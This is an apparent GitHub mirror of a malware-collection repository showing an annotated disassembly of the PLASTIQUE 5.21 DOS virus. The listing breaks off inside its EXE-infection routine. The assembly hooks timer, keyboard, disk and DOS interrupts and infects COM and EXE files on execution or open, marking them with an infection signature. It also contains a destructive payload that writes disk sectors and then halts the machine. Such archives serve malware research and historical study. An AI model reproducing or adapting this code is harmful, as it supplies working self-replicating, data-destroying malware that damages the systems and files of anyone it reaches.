mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
4b9382ddbc
push
1126 lines
42 KiB
NASM
1126 lines
42 KiB
NASM
;---------------------------------------------------------------------------
|
||
; PLASTIQE v:5.21 Virus code
|
||
;
|
||
; Disassembled by SI-IS, 1990.10.21.
|
||
;---------------------------------------------------------------------------
|
||
|
||
Org 100
|
||
|
||
|
||
0100 E9800B JMP 0C83
|
||
0103 DW ? ;Wait counter ??
|
||
|
||
0106 DW 0,0 ;Orig INT 09 handler addres
|
||
010A DW 0,0 ;Orig INT 13 handler addres
|
||
|
||
011C DW 0 ;File handle
|
||
011E DW 0 ;File attribute
|
||
012C DB 1Ch DUP(0) ;Buffer for Exe Header
|
||
|
||
|
||
014C DW ;Ofs of file name to execute
|
||
014E DB ?
|
||
|
||
014F DB ?
|
||
|
||
0158 DW 0,0 ;New size of EXE file
|
||
|
||
|
||
015D DB ?
|
||
015E DB 'ACAD.EXE'
|
||
0166 DB 'COMMAND.COM'
|
||
0171 DB '.COM'
|
||
0175 DB '.EXE'
|
||
|
||
018B DB 'PLASTIQUE 5.21 (plastic bomb)',0D,0A
|
||
'Copyright (C) 1988-1990 by ABT Group '
|
||
'(in association with Hammer LAB.)',0D,0A
|
||
'WARNING: DON'T RUN ACAD.EXE!$'
|
||
|
||
020F DB 0 ;?
|
||
0210 DW 0 ;?
|
||
|
||
0218 DB ? ? ? ;Music Data
|
||
|
||
0321 DW 0,0 ;Orig INT 08 handler addres
|
||
|
||
;---------------------------------------------------------------------------
|
||
03E9 32C0 XOR AL,AL ;(* Critical error handler *)
|
||
03EB CF IRET
|
||
;---------------------------------------------------------------------------
|
||
03EC 2E803E4F0001 CMP CS:[004F],01 ;(* INT 08 HANDLER - TIMER *)
|
||
03F2 7431 JZ 0425
|
||
03F4 50 PUSH AX
|
||
03F5 2EA14A00 MOV AX,CS:[004A]
|
||
03F9 2E39060300 CMP CS:[0003],AX
|
||
03FE 58 POP AX
|
||
03FF 7711 JA 0412
|
||
0401 2EA05D00 MOV AL,CS:[005D]
|
||
0405 0455 ADD AL,55
|
||
0407 2EA25D00 MOV CS:[005D],AL
|
||
040B 7205 JC 0412
|
||
040D 2EFF060300 INC W/CS:[0003]
|
||
0412 51 PUSH CX
|
||
0413 2E8B0E0300 MOV CX,CS:[0003]
|
||
0418 90 NOP
|
||
0419 E2FD LOOP 0418
|
||
041B 59 POP CX
|
||
041C 2EFF2E2103 JMP Far CS:[0321] ;Jump to orig INT 08 handler
|
||
0421 A5 MOVSW
|
||
0422 FE00 INC B/[BX+SI]
|
||
0424 F0 LOCK
|
||
|
||
0425 2EFF060300 INC W/CS:[0003] ;(* MUSIC *)
|
||
042A 2E813E03000080 CMP CS:[0003],8000
|
||
0431 7702 JA 0435
|
||
0433 EBE7 JMP 041C ;Jump to orig INT 08 handler
|
||
|
||
0435 1E PUSH DS
|
||
0436 50 PUSH AX
|
||
0437 53 PUSH BX
|
||
0438 0E PUSH CS
|
||
0439 1F POP DS
|
||
043A 8B1E1001 MOV BX,[0110]
|
||
043E FE0E0F01 DEC B/[010F]
|
||
0442 7567 JNZ 04AB
|
||
0444 E461 IN AL,[61] ;Speaker OFF
|
||
0446 24FE AND AL,FE
|
||
0448 E661 OUT [61],AL
|
||
044A 8B1E1001 MOV BX,[0110]
|
||
044E FF061001 INC W/[0110]
|
||
0452 81FB8300 CMP BX,0083
|
||
0456 7503 JNZ 045B
|
||
0458 EB36 JMP 0490
|
||
045A 90 NOP
|
||
045B 8A871802 MOV AL,[BX+0218]
|
||
045F A20F01 MOV [010F],AL
|
||
0462 D1E3 SHL BX,1
|
||
0464 8B871201 MOV AX,[BX+0112]
|
||
0468 3D0000 CMP AX,0000
|
||
046B 7403 JZ 0470
|
||
046D EB0A JMP 0479
|
||
046F 90 NOP
|
||
0470 E461 IN AL,[61]
|
||
0472 24FE AND AL,FE
|
||
0474 E661 OUT [61],AL
|
||
0476 EB33 JMP 04AB
|
||
0478 90 NOP
|
||
0479 8BD8 MOV BX,AX
|
||
047B B0B6 MOV AL,B6
|
||
047D E643 OUT [43],AL ;Set Timer Chip
|
||
047F 8BC3 MOV AX,BX
|
||
0481 E642 OUT [42],AL
|
||
0483 8AC4 MOV AL,AH
|
||
0485 E642 OUT [42],AL
|
||
0487 E461 IN AL,[61] ;Speaker ON
|
||
0489 0C03 OR AL,03
|
||
048B E661 OUT [61],AL
|
||
048D EB1C JMP 04AB
|
||
048F 90 NOP
|
||
0490 E461 IN AL,[61]
|
||
0492 24FE AND AL,FE
|
||
0494 E661 OUT [61],AL
|
||
0496 C70610010000 MOV [0110],0000
|
||
049C C6060F0101 MOV [010F],01
|
||
04A1 B80080 MOV AX,8000
|
||
04A4 22260500 AND AH,[0005]
|
||
04A8 A30300 MOV [0003],AX
|
||
04AB 5B POP BX
|
||
04AC 58 POP AX
|
||
04AD 1F POP DS
|
||
04AE E96BFF JMP 041C
|
||
;---------------------------------------------------------------------------
|
||
04B1 FA CLI ;(* INT 09 HANDLER - KEYBOARD *)
|
||
04B2 50 PUSH AX
|
||
04B3 1E PUSH DS
|
||
04B4 33C0 XOR AX,AX
|
||
04B6 8ED8 MOV DS,AX
|
||
04B8 A01704 MOV AL,[0417]
|
||
04BB 1F POP DS
|
||
04BC 240C AND AL,0C
|
||
04BE 3C0C CMP AL,0C
|
||
04C0 752E JNZ 04F0
|
||
04C2 E460 IN AL,[60]
|
||
04C4 247F AND AL,7F
|
||
04C6 3C53 CMP AL,53
|
||
04C8 7526 JNZ 04F0
|
||
04CA 2E813E03000080 CMP CS:[0003],8000
|
||
04D1 721D JC 04F0
|
||
04D3 2E803E4F0001 CMP CS:[004F],01
|
||
04D9 7403 JZ 04DE
|
||
04DB EB13 JMP 04F0
|
||
04DD 90 NOP
|
||
04DE E461 IN AL,[61]
|
||
04E0 0C80 OR AL,80
|
||
04E2 E661 OUT [61],AL
|
||
04E4 247F AND AL,7F
|
||
04E6 E661 OUT [61],AL
|
||
04E8 58 POP AX
|
||
04E9 B020 MOV AL,20
|
||
04EB E620 OUT [20],AL
|
||
04ED EB0A JMP 04F9
|
||
04EF 90 NOP
|
||
04F0 58 POP AX
|
||
04F1 9C PUSHF
|
||
04F2 2EFF1E0600 CALL Far CS:[0006]
|
||
04F7 FB STI
|
||
04F8 CF IRET
|
||
|
||
;---------------------------------------------------------------------------
|
||
04F9 0E PUSH CS
|
||
04FA 58 POP AX
|
||
04FB 8ED8 MOV DS,AX
|
||
04FD 8EC0 MOV ES,AX
|
||
04FF B002 MOV AL,02
|
||
0501 E621 OUT [21],AL
|
||
0503 FB STI
|
||
0504 E461 IN AL,[61]
|
||
0506 24FE AND AL,FE
|
||
0508 E661 OUT [61],AL
|
||
050A C70610010000 MOV [0110],0000
|
||
0510 C6060F0101 MOV [010F],01
|
||
0515 C70603004C7F MOV [0003],7F4C
|
||
051B B80400 MOV AX,0004 ;Set video mode to Groph 320x200
|
||
051E CD10 INT 10 ;
|
||
0520 B8070E MOV AX,0E07 ;Write teletype - Bell
|
||
0523 CD10 INT 10
|
||
0525 BEA202 MOV SI,02A2
|
||
0528 E87300 CALL 059E
|
||
052B E87000 CALL 059E
|
||
052E E83A00 CALL 056B
|
||
0531 E83700 CALL 056B
|
||
0534 C606BA0201 MOV [02BA],01
|
||
0539 BEA202 MOV SI,02A2
|
||
053C E87E00 CALL 05BD
|
||
053F E87B00 CALL 05BD
|
||
0542 E87800 CALL 05BD
|
||
0545 E87500 CALL 05BD
|
||
0548 803EBA0201 CMP [02BA],01
|
||
054D 7402 JZ 0551
|
||
054F EBE3 JMP 0534
|
||
0551 E460 IN AL,[60]
|
||
0553 8AE0 MOV AH,AL
|
||
0555 E470 IN AL,[70]
|
||
0557 3AC4 CMP AL,AH
|
||
0559 740D JZ 0568
|
||
055B B94000 MOV CX,0040
|
||
055E 8AC1 MOV AL,CL
|
||
0560 E670 OUT [70],AL
|
||
0562 B0FF MOV AL,FF
|
||
0564 E671 OUT [71],AL
|
||
0566 E2F6 LOOP 055E
|
||
0568 F4 HLT
|
||
0569 EBFD JMP 0568
|
||
|
||
056B C60400 MOV [SI],00
|
||
056E B80102 MOV AX,0201
|
||
0571 B90100 MOV CX,0001
|
||
0574 B600 MOV DH,00
|
||
0576 8A5404 MOV DL,[SI+04]
|
||
0579 BB0010 MOV BX,1000
|
||
057C E87B00 CALL 05FA
|
||
057F 7219 JC 059A
|
||
0581 C60401 MOV [SI],01
|
||
0584 BF1800 MOV DI,0018
|
||
0587 8B8D0010 MOV CX,[DI+1000]
|
||
058B 884C01 MOV [SI+01],CL
|
||
058E BF1A00 MOV DI,001A
|
||
0591 8B8D0010 MOV CX,[DI+1000]
|
||
0595 FEC9 DEC CL
|
||
0597 884C05 MOV [SI+05],CL
|
||
059A 83C606 ADD SI,0006
|
||
059D C3 RET
|
||
|
||
059E C60400 MOV [SI],00
|
||
05A1 B408 MOV AH,08
|
||
05A3 8A5404 MOV DL,[SI+04]
|
||
05A6 E87600 CALL 061F
|
||
05A9 720E JC 05B9
|
||
05AB 887405 MOV [SI+05],DH
|
||
05AE 80E13F AND CL,3F
|
||
05B1 FEC9 DEC CL
|
||
05B3 884C01 MOV [SI+01],CL
|
||
05B6 C60401 MOV [SI],01
|
||
05B9 83C606 ADD SI,0006
|
||
05BC C3 RET
|
||
|
||
05BD BB8B00 MOV BX,008B
|
||
05C0 803C01 CMP [SI],01
|
||
05C3 752E JNZ 05F3
|
||
05C5 C606BA0200 MOV [02BA],00
|
||
05CA 8B4C02 MOV CX,[SI+02]
|
||
05CD B600 MOV DH,00
|
||
05CF 8A5404 MOV DL,[SI+04]
|
||
05D2 8A4401 MOV AL,[SI+01]
|
||
05D5 B403 MOV AH,03
|
||
05D7 E82000 CALL 05FA
|
||
05DA 7214 JC 05F0
|
||
05DC FEC6 INC DH
|
||
05DE 3A7405 CMP DH,[SI+05]
|
||
05E1 76EF JNA 05D2
|
||
05E3 80440301 ADD [SI+03],01
|
||
05E7 730A JNC 05F3
|
||
05E9 80440240 ADD [SI+02],40
|
||
05ED EB04 JMP 05F3
|
||
05EF 90 NOP
|
||
05F0 C60400 MOV [SI],00
|
||
05F3 83C606 ADD SI,0006
|
||
05F6 C3 RET
|
||
|
||
05F7 DB 00,09
|
||
05F9 DB 03
|
||
|
||
05FA C606F70400 MOV [04F7],00
|
||
05FF A3F804 MOV [04F8],AX
|
||
0602 E81A00 CALL 061F
|
||
0605 80E4C3 AND AH,C3
|
||
0608 7414 JZ 061E
|
||
060A B400 MOV AH,00
|
||
060C E81000 CALL 061F
|
||
060F A1F804 MOV AX,[04F8]
|
||
0612 FE06F704 INC B/[04F7]
|
||
0616 803EF70401 CMP [04F7],01
|
||
061B 76E5 JNA 0602
|
||
061D F9 STC
|
||
061E C3 RET
|
||
|
||
061F 9C PUSHF
|
||
0620 2EFF1E0A00 CALL Far CS:[000A]
|
||
0625 C3 RET
|
||
|
||
;---------------------------------------------------------------------------
|
||
;(* INT 13 HANDLER - DISK IO *)
|
||
0626 80FC02 CMP AH,02 ;Read sector ?
|
||
0629 751B JNZ 0646 ; No
|
||
062B F6C280 TEST DL,80 ;Hard disk <C>
|
||
062E 751A JNZ 064A ; No
|
||
0630 80FA02 CMP DL,02 ;Floppy <B>
|
||
0633 7711 JA 0646
|
||
0635 83F902 CMP CX,0002
|
||
0638 750C JNZ 0646
|
||
063A 80FE00 CMP DH,00
|
||
063D 7507 JNZ 0646
|
||
063F EB13 JMP 0654
|
||
0641 90 NOP
|
||
|
||
0642 DB 01,00
|
||
0644 DB 80,01
|
||
0646 E92001 JMP 0769
|
||
0649 DB 00
|
||
|
||
064A 80FE01 CMP DH,01
|
||
064D 75F7 JNZ 0646
|
||
064F 80FD00 CMP CH,00
|
||
0652 75F2 JNZ 0646
|
||
0654 2E803E490502 CMP CS:[0549],02
|
||
065A 7407 JZ 0663
|
||
065C 2EFE064905 INC B/CS:[0549]
|
||
0661 EBE3 JMP 0646
|
||
0663 2EC606490500 MOV CS:[0549],00
|
||
0669 2E803E5C0001 CMP CS:[005C],01
|
||
066F 74D5 JZ 0646
|
||
0671 50 PUSH AX
|
||
0672 53 PUSH BX
|
||
0673 51 PUSH CX
|
||
0674 52 PUSH DX
|
||
0675 56 PUSH SI
|
||
0676 57 PUSH DI
|
||
0677 06 PUSH ES
|
||
0678 1E PUSH DS
|
||
0679 8CC8 MOV AX,CS
|
||
067B 8ED8 MOV DS,AX
|
||
067D 8EC0 MOV ES,AX
|
||
067F 8816DF02 MOV [02DF],DL
|
||
0683 B400 MOV AH,00
|
||
0685 E897FF CALL 061F
|
||
0688 BB0010 MOV BX,1000
|
||
068B B80102 MOV AX,0201
|
||
068E B90100 MOV CX,0001
|
||
0691 B600 MOV DH,00
|
||
0693 E889FF CALL 061F
|
||
0696 7243 JC 06DB
|
||
0698 F6C280 TEST DL,80
|
||
069B 7405 JZ 06A2
|
||
069D E8CE00 CALL 076E
|
||
06A0 7239 JC 06DB
|
||
06A2 B8CB3C MOV AX,3CCB
|
||
06A5 39473E CMP [BX+3E],AX
|
||
06A8 7518 JNZ 06C2
|
||
06AA 8B4740 MOV AX,[BX+40]
|
||
06AD 3DFEFF CMP AX,FFFE
|
||
06B0 7429 JZ 06DB
|
||
06B2 2B4742 SUB AX,[BX+42]
|
||
06B5 3D0400 CMP AX,0004
|
||
06B8 7508 JNZ 06C2
|
||
06BA E8E300 CALL 07A0
|
||
06BD 7303 JNC 06C2
|
||
06BF E99F00 JMP 0761
|
||
06C2 F606DF0280 TEST [02DF],80
|
||
06C7 7415 JZ 06DE
|
||
06C9 C606E10207 MOV [02E1],07
|
||
06CE C606E20200 MOV [02E2],00
|
||
06D3 C606E00200 MOV [02E0],00
|
||
06D8 EB3F JMP 0719
|
||
06DA 90 NOP
|
||
06DB E98300 JMP 0761
|
||
06DE C606E10201 MOV [02E1],01
|
||
06E3 C606E20228 MOV [02E2],28
|
||
06E8 8A4715 MOV AL,[BX+15]
|
||
06EB 3CFC CMP AL,FC
|
||
06ED 7305 JNC 06F4
|
||
06EF C606E20250 MOV [02E2],50
|
||
06F4 A0E202 MOV AL,[02E2]
|
||
06F7 BBBB02 MOV BX,02BB
|
||
06FA B90900 MOV CX,0009
|
||
06FD 8807 MOV [BX],AL
|
||
06FF 83C304 ADD BX,0004
|
||
0702 E2F9 LOOP 06FD
|
||
0704 B80905 MOV AX,0509
|
||
0707 BBBB02 MOV BX,02BB
|
||
070A C606E00200 MOV [02E0],00
|
||
070F C606E10201 MOV [02E1],01
|
||
0714 E8AD00 CALL 07C4
|
||
0717 7248 JC 0761
|
||
0719 BB0000 MOV BX,0000
|
||
071C A1E102 MOV AX,[02E1]
|
||
071F A3440E MOV [0E44],AX
|
||
0722 A1DF02 MOV AX,[02DF]
|
||
0725 A3460E MOV [0E46],AX
|
||
0728 B80903 MOV AX,0309
|
||
072B E89600 CALL 07C4
|
||
072E 7231 JC 0761
|
||
0730 C606E10201 MOV [02E1],01
|
||
0735 C606E20200 MOV [02E2],00
|
||
073A F6C280 TEST DL,80
|
||
073D 740C JZ 074B
|
||
073F A14205 MOV AX,[0542]
|
||
0742 A3E102 MOV [02E1],AX
|
||
0745 A14405 MOV AX,[0544]
|
||
0748 A3DF02 MOV [02DF],AX
|
||
074B BE0310 MOV SI,1003
|
||
074E BF030E MOV DI,0E03
|
||
0751 B92300 MOV CX,0023
|
||
0754 90 NOP
|
||
0755 FC CLD
|
||
0756 F3A4 REP MOVSB
|
||
0758 BB000E MOV BX,0E00
|
||
075B B80103 MOV AX,0301
|
||
075E E86300 CALL 07C4
|
||
0761 1F POP DS
|
||
0762 07 POP ES
|
||
0763 5F POP DI
|
||
0764 5E POP SI
|
||
0765 5A POP DX
|
||
0766 59 POP CX
|
||
0767 5B POP BX
|
||
0768 58 POP AX
|
||
0769 2EFF2E0A00 JMP Far CS:[000A]
|
||
|
||
076E BEBE11 MOV SI,11BE
|
||
0771 B304 MOV BL,04
|
||
0773 803C80 CMP [SI],80
|
||
0776 740E JZ 0786
|
||
0778 803C00 CMP [SI],00
|
||
077B 7507 JNZ 0784
|
||
077D 83C610 ADD SI,0010
|
||
0780 FECB DEC BL
|
||
0782 75EF JNZ 0773
|
||
0784 F9 STC
|
||
0785 C3 RET
|
||
0786 8B04 MOV AX,[SI]
|
||
0788 A34405 MOV [0544],AX
|
||
078B 8B4402 MOV AX,[SI+02]
|
||
078E A34205 MOV [0542],AX
|
||
0791 8B14 MOV DX,[SI]
|
||
0793 8B4C02 MOV CX,[SI+02]
|
||
0796 B80102 MOV AX,0201
|
||
0799 BB0010 MOV BX,1000
|
||
079C E85BFE CALL 05FA
|
||
079F C3 RET
|
||
07A0 8B4740 MOV AX,[BX+40]
|
||
07A3 33D2 XOR DX,DX
|
||
07A5 F77718 DIV W/[BX+18]
|
||
07A8 FEC2 INC DL
|
||
07AA 8816E102 MOV [02E1],DL
|
||
07AE 33D2 XOR DX,DX
|
||
07B0 F7771A DIV W/[BX+1A]
|
||
07B3 8816E002 MOV [02E0],DL
|
||
07B7 A2E202 MOV [02E2],AL
|
||
07BA B80102 MOV AX,0201
|
||
07BD BB0010 MOV BX,1000
|
||
07C0 E80100 CALL 07C4
|
||
07C3 C3 RET
|
||
07C4 8B0EE102 MOV CX,[02E1]
|
||
07C8 8B16DF02 MOV DX,[02DF]
|
||
07CC E82BFE CALL 05FA
|
||
07CF C3 RET
|
||
07D0 60
|
||
07D1 1478
|
||
07D3 02
|
||
|
||
|
||
;---------------------------------------------------------------------------
|
||
07D4 9C PUSHF ;(* INT 21 HANDLER - DOS FUNC *)
|
||
07D5 3D404B CMP AX,4B40 ;AL = 40 - Invalid call
|
||
07D8 7505 JNZ 07DF
|
||
07DA B87856 MOV AX,5678 ;Detect Plastiqe ?
|
||
07DD 9D POPF
|
||
07DE CF IRET
|
||
|
||
07DF 3D414B CMP AX,4B41 ;AL = 41 - Invalid call
|
||
07E2 741E JZ 0802
|
||
|
||
07E4 3D004B CMP AX,4B00 ;AX = 4B00 - Load And Run Program
|
||
07E7 7503 JNZ 07EC
|
||
07E9 EB34 JMP 081F
|
||
07EB 90 NOP
|
||
|
||
07EC 3D003D CMP AX,3D00 ;AX = 3D00 - Open File to Read
|
||
07EF 750B JNZ 07FC
|
||
07F1 2E803E4E0001 CMP CS:[004E],01
|
||
07F7 7403 JZ 07FC
|
||
07F9 EB24 JMP 081F
|
||
07FB 90 NOP
|
||
07FC 9D POPF
|
||
07FD 2EFF2ED006 JMP Far CS:[06D0] ;Jump to orig Dos handler
|
||
|
||
0802 58 POP AX
|
||
0803 58 POP AX
|
||
0804 B80001 MOV AX,0100
|
||
0807 2EA31400 MOV CS:[0014],AX
|
||
080B 58 POP AX
|
||
080C 2EA31600 MOV CS:[0016],AX
|
||
0810 F3A4 REP MOVSB
|
||
0812 9D POPF
|
||
0813 E88003 CALL 0B96 ;Zero register
|
||
0816 8B0E2400 MOV CX,[0024]
|
||
081A 2EFF2E1400 JMP Far CS:[0014]
|
||
|
||
081F 2EC7061C00FFFF MOV CS:[001C],FFFF ;
|
||
0826 2EC70648000000 MOV CS:[0048],0000
|
||
082D 2E89161800 MOV CS:[0018],DX ;Name of file to execute
|
||
0832 2E8C1E1A00 MOV CS:[001A],DS
|
||
0837 50 PUSH AX
|
||
0838 53 PUSH BX
|
||
0839 51 PUSH CX
|
||
083A 52 PUSH DX
|
||
083B 56 PUSH SI
|
||
083C 57 PUSH DI
|
||
083D 1E PUSH DS
|
||
083E 06 PUSH ES
|
||
083F FC CLD
|
||
0840 8BF2 MOV SI,DX
|
||
0842 8A04 MOV AL,[SI] ;Convert file name to UpperCase
|
||
0844 0AC0 OR AL,AL
|
||
0846 740E JZ 0856
|
||
0848 3C61 CMP AL,61 ;'a'
|
||
084A 7207 JC 0853
|
||
084C 3C7A CMP AL,7A ;'z'
|
||
084E 7703 JA 0853
|
||
0850 802C20 SUB [SI],20
|
||
0853 46 INC SI
|
||
0854 EBEC JMP 0842
|
||
|
||
0856 2E89364C00 MOV CS:[004C],SI ;SI = ptr to End of ASCIIZ fname
|
||
085B 8BC6 MOV AX,SI
|
||
085D 0E PUSH CS
|
||
085E 07 POP ES
|
||
085F B90B00 MOV CX,000B ;Length of string
|
||
0862 2BF1 SUB SI,CX
|
||
0864 BF6600 MOV DI,0066 ;Ptr to 'COMMAND.COM' string
|
||
0867 F3A6 REP CMPSB ;File name = 'COMMAND.COM' ?
|
||
0869 7503 JNZ 086E ; No
|
||
086B E9F702 JMP 0B65 ; Yes - Exit from handler
|
||
|
||
086E 8BF0 MOV SI,AX
|
||
0870 B90800 MOV CX,0008 ;Length of string
|
||
0873 2BF1 SUB SI,CX
|
||
0875 BF5E00 MOV DI,005E ;Ptr to 'ACAD.EXE' string
|
||
0878 F3A6 REP CMPSB ;File name = 'ACAD.EXE' ?
|
||
087A 751C JNZ 0898 ; No
|
||
087C 0E PUSH CS ; Yes
|
||
087D 1F POP DS
|
||
087E 0E PUSH CS
|
||
087F 07 POP ES
|
||
0880 B409 MOV AH,09 ;Print String
|
||
0882 BA8B00 MOV DX,008B ; Virus (c) & WARNING
|
||
0885 CD21 INT 21
|
||
0887 C6064F0001 MOV [004F],01
|
||
088C C70603000080 MOV [0003],8000
|
||
0892 BEAE02 MOV SI,02AE
|
||
0895 E996FC JMP 052E ;jmp to music rutin (halt proc)
|
||
|
||
0898 B80043 MOV AX,4300 ;Get file attribute
|
||
089B CD21 INT 21
|
||
089D 7205 JC 08A4
|
||
089F 2E890E1E00 MOV CS:[001E],CX ;Save it
|
||
08A4 7271 JC 0917
|
||
08A6 32C0 XOR AL,AL
|
||
08A8 2EA22B00 MOV CS:[002B],AL
|
||
08AC 2E8B364C00 MOV SI,CS:[004C]
|
||
08B1 B90400 MOV CX,0004 ;Length of string
|
||
08B4 2BF1 SUB SI,CX
|
||
08B6 BF7100 MOV DI,0071 ;Ptr to '.COM' string
|
||
08B9 F3A6 REP CMPSB ;File extension = '.COM' ?
|
||
08BB 741C JZ 08D9 ; Yes
|
||
08BD 2EFE062B00 INC B/CS:[002B]
|
||
08C2 2E8B364C00 MOV SI,CS:[004C]
|
||
08C7 B90400 MOV CX,0004 ;Length of string
|
||
08CA 2BF1 SUB SI,CX
|
||
08CC BF7500 MOV DI,0075 ;Ptr to '.EXE' string
|
||
08CF F3A6 REP CMPSB ;File extension = '.EXE' ?
|
||
08D1 7406 JZ 08D9 ; Yes
|
||
08D3 83C1FF ADD CX,FFFF ; No
|
||
08D6 EB3F JMP 0917
|
||
08D8 90 NOP
|
||
08D9 8BFA MOV DI,DX
|
||
08DB 32D2 XOR DL,DL
|
||
08DD 807D013A CMP [DI+01],3A
|
||
08E1 7505 JNZ 08E8
|
||
08E3 8A15 MOV DL,[DI]
|
||
08E5 80E21F AND DL,1F
|
||
08E8 B436 MOV AH,36 ;Get disk free space
|
||
08EA CD21 INT 21
|
||
08EC 3DFFFF CMP AX,FFFF ; = Set carry flag
|
||
08EF 7503 JNZ 08F4
|
||
08F1 E97102 JMP 0B65
|
||
08F4 F7E3 MUL BX
|
||
08F6 F7E1 MUL CX
|
||
08F8 0BD2 OR DX,DX
|
||
08FA 7505 JNZ 0901
|
||
08FC 3D0010 CMP AX,1000 ;Available Space > 4096 ?
|
||
08FF 72F0 JC 08F1
|
||
0901 2E8B161800 MOV DX,CS:[0018]
|
||
0906 B8003D MOV AX,3D00 ;Open file to read
|
||
0909 2EC6064E0001 MOV CS:[004E],01
|
||
090F CD21 INT 21
|
||
0911 2EC6064E0000 MOV CS:[004E],00
|
||
0917 7267 JC 0980
|
||
0919 2EA31C00 MOV CS:[001C],AX
|
||
091D 8BD8 MOV BX,AX ;BX = File handle
|
||
091F B80242 MOV AX,4202 ;Set file pos to EOF
|
||
0922 B9FFFF MOV CX,FFFF
|
||
0925 BAFBFF MOV DX,FFFB
|
||
0928 CD21 INT 21
|
||
092A 7254 JC 0980
|
||
092C 050500 ADD AX,0005
|
||
092F 2EA32400 MOV CS:[0024],AX
|
||
0933 B80042 MOV AX,4200 ;Set file pos 0
|
||
0936 B90000 MOV CX,0000
|
||
0939 BA1200 MOV DX,0012
|
||
093C CD21 INT 21
|
||
093E 7240 JC 0980
|
||
0940 B90200 MOV CX,0002 ;Read 2 byte
|
||
0943 BA4600 MOV DX,0046
|
||
0946 8BFA MOV DI,DX
|
||
0948 8CC8 MOV AX,CS
|
||
094A 8ED8 MOV DS,AX
|
||
094C 8EC0 MOV ES,AX
|
||
094E B43F MOV AH,3F
|
||
0950 CD21 INT 21
|
||
0952 8B05 MOV AX,[DI]
|
||
0954 3D8919 CMP AX,1989
|
||
0957 7507 JNZ 0960
|
||
0959 B43E MOV AH,3E ;Close file
|
||
095B CD21 INT 21
|
||
095D E90502 JMP 0B65
|
||
0960 B82435 MOV AX,3524 ;Get INT 24 vector
|
||
0963 CD21 INT 21 ; (Critical error handler)
|
||
0965 891EE502 MOV [02E5],BX ;Store it
|
||
0969 8C06E702 MOV [02E7],ES
|
||
096D BAE902 MOV DX,02E9
|
||
0970 B82425 MOV AX,2524
|
||
0973 CD21 INT 21
|
||
0975 C5161800 LDS DX,[0018]
|
||
0979 33C9 XOR CX,CX
|
||
097B B80143 MOV AX,4301 ;Set file attribute
|
||
097E CD21 INT 21
|
||
0980 723B JC 09BD
|
||
0982 2E8B1E1C00 MOV BX,CS:[001C]
|
||
0987 B43E MOV AH,3E ;Close file
|
||
0989 CD21 INT 21
|
||
098B 2EC7061C00FFFF MOV CS:[001C],FFFF
|
||
0992 B8023D MOV AX,3D02 ;Open file to Write
|
||
0995 CD21 INT 21
|
||
0997 7224 JC 09BD
|
||
0999 2EA31C00 MOV CS:[001C],AX ;Store handle
|
||
099D 8CC8 MOV AX,CS
|
||
099F 8ED8 MOV DS,AX
|
||
09A1 8EC0 MOV ES,AX
|
||
09A3 8B1E1C00 MOV BX,[001C]
|
||
09A7 B80057 MOV AX,5700 ;Get file date
|
||
09AA CD21 INT 21
|
||
09AC 89162000 MOV [0020],DX ;Store it
|
||
09B0 890E2200 MOV [0022],CX
|
||
09B4 B80042 MOV AX,4200 ;Set file pos to 0
|
||
09B7 33C9 XOR CX,CX
|
||
09B9 8BD1 MOV DX,CX
|
||
09BB CD21 INT 21
|
||
09BD 725F JC 0A1E
|
||
09BF 803E2B0000 CMP [002B],00 ;File type ? 0 if .COM
|
||
09C4 7403 JZ 09C9
|
||
09C6 EB72 JMP 0A3A
|
||
09C8 90 NOP
|
||
;INFECT COM FILE ---------------
|
||
09C9 BB0010 MOV BX,1000 ;Allocate 1000h paragraphs
|
||
09CC B448 MOV AH,48
|
||
09CE CD21 INT 21
|
||
09D0 730B JNC 09DD ;Ok, mem allocated
|
||
09D2 B43E MOV AH,3E ;Error, Close file
|
||
09D4 8B1E1C00 MOV BX,[001C]
|
||
09D8 CD21 INT 21
|
||
09DA E98801 JMP 0B65 ;Exit from handler
|
||
09DD FF064800 INC W/[0048]
|
||
09E1 8EC0 MOV ES,AX ;Segment of allocated memory
|
||
09E3 33F6 XOR SI,SI
|
||
09E5 8BFE MOV DI,SI
|
||
09E7 A10300 MOV AX,[0003]
|
||
09EA 0C01 OR AL,01
|
||
09EC 813E03000080 CMP [0003],8000
|
||
09F2 7202 JC 09F6
|
||
09F4 B000 MOV AL,00
|
||
09F6 A20500 MOV [0005],AL
|
||
09F9 C6065C0001 MOV [005C],01
|
||
09FE E87201 CALL 0B73 ;DeCode text
|
||
0A01 B90010 MOV CX,1000
|
||
0A04 F3A4 REP MOVSB ;Move virus to begin of block
|
||
0A06 E86A01 CALL 0B73 ;Code text
|
||
0A09 C6065C0000 MOV [005C],00
|
||
0A0E 8BD7 MOV DX,DI ;Addr of buffer
|
||
0A10 8B0E2400 MOV CX,[0024] ;Nr Of Bytes to read
|
||
0A14 8B1E1C00 MOV BX,[001C] ;Handle
|
||
0A18 06 PUSH ES
|
||
0A19 1F POP DS
|
||
0A1A B43F MOV AH,3F ;Read from file
|
||
0A1C CD21 INT 21
|
||
0A1E 7215 JC 0A35
|
||
0A20 03F9 ADD DI,CX ;DI = New file size
|
||
0A22 7211 JC 0A35
|
||
0A24 33C9 XOR CX,CX
|
||
0A26 8BD1 MOV DX,CX
|
||
0A28 B80042 MOV AX,4200 ;Set file pos to 0
|
||
0A2B CD21 INT 21
|
||
0A2D 8BCF MOV CX,DI ;Write To File Virus + Orig code
|
||
0A2F 33D2 XOR DX,DX
|
||
0A31 B440 MOV AH,40
|
||
0A33 CD21 INT 21
|
||
0A35 720D JC 0A44
|
||
0A37 E9E600 JMP 0B20
|
||
|
||
;INFECT EXE FILES
|
||
0A3A B91C00 MOV CX,001C ;Read 1C byte from begin of file
|
||
0A3D BA2C00 MOV DX,002C
|
||
0A40 B43F MOV AH,3F
|
||
0A42 CD21 INT 21
|
||
0A44 7252 JC 0A98
|
||
0A46 813E3E008919 CMP [003E],1989 ;If INFECTED
|
||
0A4C 744A JZ 0A98 ;>> Here equal - Exit handler
|
||
0A4E C7063E008919 MOV [003E],1989
|
||
0A54 A13A00 MOV AX,[003A] ;SS
|
||
0A57 A35600 MOV [0056],AX
|
||
0A5A A13C00 MOV AX,[003C] ;SP
|
||
0A5D A35000 MOV [0050],AX
|
||
0A60 A14000 MOV AX,[0040] ;IP
|
||
0A63 A35200 MOV [0052],AX
|
||
0A66 A14200 MOV AX,[0042] ;CS
|
||
0A69 A35400 MOV [0054],AX
|
||
0A6C A13000 MOV AX,[0030]
|
||
0A6F 833E2E0000 CMP [002E],0000
|
||
0A74 7401 JZ 0A77
|
||
0A76 48 DEC AX
|
||
0A77 F7267B00 MUL W/[007B]
|
||
